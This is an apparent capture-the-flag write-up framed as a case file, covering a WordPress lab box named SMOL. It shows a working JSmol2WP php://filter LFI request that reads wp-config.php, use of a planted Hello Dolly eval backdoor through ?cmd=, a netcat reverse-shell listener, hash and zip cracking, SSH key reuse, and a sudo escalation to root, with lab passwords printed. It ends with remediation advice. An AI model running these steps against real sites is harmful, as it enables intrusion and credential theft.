Case file

JSmol2WP LFI, Hello Dolly backdoor, and multi-user sudo root

Intermediate WordPress engagement: JSmol2WP SSRF/LFI read wp-config and a Hello Dolly backdoor for RCE; MySQL hashes and SSH key pivots through diego/think/gege reached xavi with unrestricted sudo.

Intermediate32 minWordPress · LFI · SSH · Privilege Escalation
  • Unauthenticated JSmol2WP LFI exposed wp-config and a backdoored Hello Dolly plugin. Credential and key pivots across WordPress users ended with xavi’s full sudo.

  • php://filter through jsmol.php read wp-config and the backdoored Hello Dolly plugin; admin ?cmd= opened a reverse shell.

  • diego from MySQL hashes; think via readable id_rsa; gege empty password and zip crack toward xavi.

  • Old wp-config disclosed xavi credentials. sudo -l showed ALL — root shell without further abuse.

01

Engagement summary

Unauthenticated JSmol2WP LFI exposed wp-config and a backdoored Hello Dolly plugin. Credential and key pivots across WordPress users ended with xavi’s full sudo.

SMOL (10.10.165.190 / www.smol.thm) ran WordPress 6.7.1 with plugin jsmol2wp ≤ 1.07. CVE-2018-20463-class SSRF accepted php://filter reads of wp-config.php (wpuser database credentials) and of a Hello Dolly plugin containing eval(base64_decode(...)). Logging in as wpuser and hitting /wp-admin/?cmd= produced a www-data shell. MySQL wp_users hashes cracked to diego; diego’s group could read think’s id_rsa for SSH. gege accepted an empty password and held wordpress.old.zip; zip2john recovered a password that unlocked an old wp-config with xavi’s credentials. xavi had (ALL : ALL) ALL in sudoers — root without further exploitation.

Business impact

Abandoned plugins with SSRF/LFI and planted backdoors are RCE. Password reuse across WP, SSH, and zip archives plus empty local passwords collapse multi-user isolation. Unrestricted sudo on any account is root by policy. Remove jsmol2wp, audit plugins for eval backdoors, enforce unique secrets, and never grant ALL sudo to application users.

02

JSmol2WP LFI and Hello Dolly RCE

php://filter through jsmol.php read wp-config and the backdoored Hello Dolly plugin; admin ?cmd= opened a reverse shell.

OPERATOR · WPSCAN

savvy@lab:~$ echo '10.10.165.190 www.smol.thm' | sudo tee -a /etc/hosts

savvy@lab:~$ wpscan --url http://www.smol.thm --enumerate u,ap

Users: admin, think, wp, gege, diego, xavi

Plugin: jsmol2wp <= 1.07 (SSRF/LFI)

OPERATOR · LFI / RCE

savvy@lab:~$ curl -s 'http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php'

DB_USER wpuser / DB_PASSWORD kblsF2Vop#lw3rjDZ629*Z%G

# same LFI → hello.php backdoor; login as wpuser then /wp-admin/?cmd=

savvy@lab:~$ nc -lvnp 4444

savvy@lab:/var/www/html$

03

Hash crack and SSH key pivots

diego from MySQL hashes; think via readable id_rsa; gege empty password and zip crack toward xavi.

OPERATOR · LATERAL

savvy@lab:~$ mysql -u wpuser -p -e 'SELECT user_login,user_pass FROM wp_users'

savvy@lab:~$ john hashes.txt --wordlist=rockyou.txt

sandiegocalifornia (diego)

savvy@lab:~$ su diego

savvy@lab:~$ ssh -i /home/think/.ssh/id_rsa think@10.10.165.190

savvy@lab:~$

savvy@lab:~$ su gege

savvy@lab:~$ zip2john wordpress.old.zip > z.hash && john z.hash

hero_gege@hotmail.com (wordpress.old.zip)

04

xavi unrestricted sudo

Old wp-config disclosed xavi credentials. sudo -l showed ALL — root shell without further abuse.

OPERATOR · ROOT

# old wp-config → xavi / P@ssw0rdxavi@

savvy@lab:~$ su xavi

savvy@lab:~$ sudo -l

(ALL : ALL) ALL

savvy@lab:~$ sudo su

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Remove jsmol2wp and scan plugins for eval backdoors. Rotate all WP and OS passwords after compromise. Fix home-directory ACLs so users cannot read others’ SSH keys. Revoke blanket sudo; use named commands only.